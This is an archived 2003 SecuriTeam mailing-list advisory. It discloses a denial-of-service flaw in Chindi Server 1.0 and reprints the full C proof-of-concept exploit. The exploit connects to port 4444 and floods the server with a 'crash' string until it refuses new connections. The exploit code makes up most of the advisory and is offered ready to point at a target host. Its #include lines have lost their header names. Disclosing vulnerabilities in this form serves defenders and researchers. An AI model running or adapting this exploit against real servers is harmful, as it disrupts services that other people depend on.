[EXPL] Chindi DoS Exploit Code

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 31 Mar 2003 22:14:31 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Chindi DoS Exploit Code
------------------------------------------------------------------------

SUMMARY

Chindi is a server/client software package for encrypted file transfer
written in Java.
A security vulnerability in the product allows remote attackers to cause a
DoS attack.

DETAILS

Vulnerable systems:
Chindi Server version 1.0

Exploit code:
/************************************************************
* Chindi server 1.0 Denial of Service
* Proof of Concept by Luca Ercoli luca.ercoli at inwind.it
* After DoS, server appears to be up, but will not allow
* new connections. *
*************************************************************/

#include
#include
#include
#include
#include

#define PORT 4444
#define DOS "crash"

int main(int argc, char *argv[]){

int nOpt,count,sockfd;
struct hostent *he;
struct sockaddr_in server_addr;

char *host;

printf ("\nChindi server 1.0 remote DoS\n\n");

if(argc < 2 ) {
                printf ("Usage: %s -t target\n",argv[0]);
                exit(0);
        }

while((nOpt = getopt(argc, argv, "t")) != -1) {

        switch(nOpt) {
                        case 't':
                        host = optarg;
                        break;
                        default:exit(0);
                }
        }

if ((he = gethostbyname(argv[2])) == NULL)
          {
                  herror("gethostbyname");
                  exit(1);
          }

server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(PORT);
server_addr.sin_addr = *((struct in_addr *) he->h_addr);

sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct
sockaddr)) == -1)
          {
                  perror("Connect");
                  exit(1);
          }

printf("1. Connected\n");
sleep(1);
printf("2. Sending crash string\n");
sleep(1);
printf("3. Verifing server status: ");
sleep(1);

for (count=0; count<9999; count++) send(sockfd,DOS,strlen(DOS),0);

close(sockfd);

if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct
sockaddr)) == -1)
          {
                 printf("Crashed!.\n");
        exit(1);
          }

else { printf("Server don't crash!\n"); exit(0); }

}

ADDITIONAL INFORMATION

The information has been provided by
<mailto:luca.ercoli@inwind.it.luca.ercoli@inwind.it>
luca.ercoli@inwind.it.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]